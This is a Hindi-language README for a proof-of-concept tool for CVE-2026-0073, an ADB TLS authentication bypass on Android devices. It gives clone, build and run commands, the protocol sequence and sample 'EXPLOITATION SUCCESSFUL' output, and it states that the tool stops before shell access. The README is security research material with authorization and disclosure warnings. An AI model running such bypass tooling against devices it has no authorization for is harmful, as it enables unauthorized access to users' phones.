
CVE-2026-0073 के लिए सुरक्षा अनुसंधान PoC: ADB प्रमाणीकरण बायपास सत्यापन
सुरक्षा अनुसंधान PoC द्वारा naheeju
सुरक्षा सूचना: CVE-2026-0073 को 2026-05-01 तक पैच कर दिया गया है। यह PoC केवल सुरक्षा अनुसंधान, भेद्यता विश्लेषण, और प्रभावित सिस्टम के अधिकृत परीक्षण के लिए प्रदान किया गया है।
इस रिपॉजिटरी में सुरक्षा अनुसंधान, भेद्यता विश्लेषण, अधिकृत पेनेट्रेशन परीक्षण और शैक्षिक उद्देश्यों के लिए बनाया गया एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है।
केवल उन्हीं सिस्टम और डिवाइसों का परीक्षण करें जिनके आप स्वामी हैं या जिनके मूल्यांकन की आपके पास स्पष्ट अनुमति है।
यह सार्वजनिक PoC जानबूझकर प्रमाणीकरण स्थिति को पुन: उत्पन्न करने के बाद रुक जाता है। यह नहीं करता:
इस रिपॉजिटरी का उद्देश्य भेद्यता स्थिति को नियंत्रित और गैर-विनाशकारी तरीके से प्रदर्शित करना है।
POC-CVE-2026-0073 एक Go-आधारित प्रूफ ऑफ कॉन्सेप्ट है जो भेद्यता से जुड़े
ADB प्रमाणीकरण प्रवाह का परीक्षण करता है। PoC सीधे ADB सेवा के साथ संचार करता है
और CNXN → STLS → TLS प्रमाणीकरण अनुक्रम का अवलोकन करता है।
ADB लक्ष्य
│
│ TCP
▼
CNXN अनुरोध
│
▼
tls_auth का पता चला
│
▼
STLS अनुरोध
│
▼
TLS प्रमाणीकरण परीक्षण
│
▼
भेद्यता स्थिति पुन: उत्पन्न हुई
│
▼
शोषण सफल
│
▼
रुकें
PoC इस बिंदु पर समाप्त हो जाता है और प्रमाणीकरण के बाद शेल एक्सेस तक आगे नहीं बढ़ता।
CNXN संदेश भेजता है।tls_auth का विज्ञापन करता है या नहीं।STLS अनुरोध की प्रतीक्षा करता है।प्रमाणपत्र मेमोरी में उत्पन्न होता है और जानबूझकर डिस्क पर नहीं लिखा जाता।
सार्वजनिक कार्यान्वयन जानबूझकर सफल प्रमाणीकरण सत्यापन के बाद रुक जाता है। इस PoC में प्रमाणीकरण के बाद कोई सेवा खोलना शामिल नहीं है।
विशेष रूप से, PoC shell: नहीं खोलता और कमांड तर्क स्वीकार नहीं करता।
यह सार्वजनिक रिपॉजिटरी को सामान्य-उद्देश्य वाले रिमोट शेल कार्यान्वयन प्रदान करने के बजाय
भेद्यता सत्यापन पर केंद्रित रखता है।
PoC चलाने से पहले, सुनिश्चित करें कि लक्ष्य डिवाइस निम्नलिखित शर्तों को पूरा करता है:
अपनी Go स्थापना की जाँच करें:
go version
POC-CVE-2026-0073/
├── cmd/
│ └── main.go
├── go.mod
├── go.sum
└── README.md
cmd/main.go में सार्वजनिक भेद्यता सत्यापन PoC शामिल है।
git clone https://github.com/naheeju/POC-CVE-2026-0073.git
cd POC-CVE-2026-0073
go mod download
go run ./cmd <IP> [PORT] [KEY_TYPE]
# डिफ़ॉल्ट EC प्रमाणपत्र
go run ./cmd 192.168.1.2 5555 ec
# Ed25519
go run ./cmd 192.168.1.2 5555 ed25519
# कस्टम पोर्ट
go run ./cmd 192.168.1.2 35495 ec
IP पते और पोर्ट को अपने अधिकृत प्रयोगशाला लक्ष्य के साथ बदलें।
go build -o netra ./cmd
./netra 192.168.1.2 5555 ec
संकलित
netraबाइनरी एक स्थानीय बिल्ड आर्टिफैक्ट है और इसे सार्वजनिक रिपॉजिटरी में कमिट नहीं किया जाना चाहिए।
============================================================
ADB AUTHENTICATION BYPASS - PoC
============================================================
By: naheeju
============================================================
Security Research / Authorized Testing Only
This PoC intentionally stops before shell execution.
============================================================
[*] Target : 192.168.1.2:35495
[*] Key type : ec
[*] Mode : Authentication verification
[*] Generating ec test certificate in memory...
[+] Test certificate generated.
[*] Connecting to ADB service...
[*] Sending CNXN...
[+] STLS requested (TLS version: 0x1000000)
[*] Confirming TLS upgrade...
[*] Testing TLS authentication validation...
[+] TLS handshake accepted.
Protocol : TLSv1.3
Cipher : 0x1301
============================================================
EXPLOITATION SUCCESSFUL
============================================================
[+] Authentication condition reproduced.
[+] TLS authentication was accepted.
[+] Vulnerability condition confirmed.
[*] Safety boundary reached.
[*] No ADB shell was opened.
[*] No command was executed.
[*] PoC terminated safely.
============================================================
EXPLOITATION SUCCESSFUL का क्या अर्थ है?इस रिपॉजिटरी में, इस संदेश का अर्थ है कि PoC ने सफलतापूर्वक परीक्षण की जा रही प्रमाणीकरण स्थिति को पुन: उत्पन्न किया। इसका यह अर्थ नहीं है कि:
PoC जानबूझकर सत्यापन चरण के तुरंत बाद समाप्त हो जाता है।
यदि लक्ष्य प्रमाणीकरण परीक्षण को अस्वीकार करता है, तो PoC प्रमाणीकरण विफलता की रिपोर्ट करता है और समाप्त हो जाता है:
[-] Authentication was rejected.
संभावित कारणों में शामिल हैं:
tls_auth का विज्ञापन नहीं किया गया है।एक असफल परिणाम को इस प्रमाण के रूप में नहीं समझा जाना चाहिए कि एक डिवाइस हर दृष्टि से सुरक्षित है। यह केवल इंगित करता है कि इस विशेष PoC ने परीक्षण की गई स्थिति को पुन: उत्पन्न नहीं किया।
PoC सामान्य adb कमांड-लाइन क्लाइंट पर निर्भर रहने के बजाय
प्रासंगिक ADB प्रोटोकॉल संदेशों को सीधे लागू करता है।
Client ADB Service
│ │
│────── CNXN ───────────────────>│
│<───── CNXN ────────────────────│
│<───── STLS ────────────────────│
│────── STLS ───────────────────>│
│<═══════ TLS Handshake ═════════>│
│ │
│ Authentication Test │
│ Verification Result │
│ │
X────── PoC Terminates ──────────
सार्वजनिक PoC ADB शेल/सेवा परत में आगे नहीं बढ़ता।
PoC दो परीक्षण प्रमाणपत्र प्रकार उत्पन्न कर सकता है: ec और ed25519।
उत्पन्न प्रमाणपत्र और निजी कुंजी परीक्षण के लिए मेमोरी में रखी जाती हैं और PoC द्वारा स्थायी कुंजी फ़ाइलों के रूप में संग्रहीत नहीं की जाती हैं।
जिम्मेदार परीक्षण के लिए, जब भी संभव हो एक पृथक वातावरण का उपयोग करें:
┌─────────────────────┐
│ Research Machine │
│ Go PoC │
└──────────┬──────────┘
│ Isolated LAN
▼
┌─────────────────────┐
│ Test Android │
│ ADB Service │
└─────────────────────┘
भेद्य परीक्षण अवसंरचना को सार्वजनिक इंटरनेट पर उजागर न करें।
यदि यह अनुसंधान उन सॉफ़्टवेयर या डिवाइसों को प्रभावित करने वाली भेद्यता की पहचान करता है जिनके आप स्वामी नहीं हैं, तो उचित विक्रेता सुरक्षा संपर्क और जिम्मेदार प्रकटीकरण प्रक्रिया का पालन करें।
इस प्रोजेक्ट का उपयोग बिना प्राधिकरण के सिस्टम तक पहुँचने के लिए न करें।
यह रिपॉजिटरी जानबूझकर अलग करती है:
Vulnerability Research → Reproduction → Verification → Documentation
प्रमाणीकरण के बाद के शोषण से। सार्वजनिक PoC का उद्देश्य भेद्यता को अवलोकनीय, पुन: उत्पन्न करने योग्य और समझने योग्य बनाना है जबकि एक स्पष्ट सुरक्षा सीमा बनाए रखना है।
naheeju — सुरक्षा शोधकर्ता
| तर्क | आवश्यक | डिफ़ॉल्ट | विवरण |
|---|
IP | हाँ | — | अधिकृत परीक्षण डिवाइस का IP पता |
PORT | नहीं | 5555 | ADB TCP सेवा पोर्ट |
KEY_TYPE | नहीं | ec | प्रमाणपत्र प्रकार: ec या ed25519 |